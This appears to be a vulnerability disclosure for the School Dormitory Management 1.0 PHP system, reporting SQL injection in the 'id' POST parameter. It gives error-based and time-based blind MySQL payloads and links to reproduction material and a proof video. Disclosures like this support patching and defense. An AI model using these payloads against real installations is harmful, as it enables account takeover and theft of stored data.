School Dormitory Management 1.0 SQL Injection

## Title: School Dormitory Management 1.0 SQLi## Author: nu11secur1ty## Date: 05.09.2022## Vendor: https://www.sourcecodester.com/users/tips23## Software: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/School-Dormitory-Management## Description:The id parameter appears to be vulnerable to SQL injection attacks.A single quote was submitted in the id parameter, and a database errormessage was returned.Two single quotes were then submitted and the error message disappeared.The attacker can take administrator accounts control and also of allaccounts on this system, also the malicious user can download allinformation about this system.Status: CRITICAL[+] Payloads:```mysql---Parameter: id (POST)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: id=2' AND (SELECT 7198 FROM(SELECTCOUNT(*),CONCAT(0x716b7a6a71,(SELECT(ELT(7198=7198,1))),0x7170717171,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# JPhD    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=2' AND (SELECT 6966 FROM (SELECT(SLEEP(5)))amnS)# UIgv---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/School-Dormitory-Management)## Proof and Exploit:[href](https://streamable.com/hd6xo1)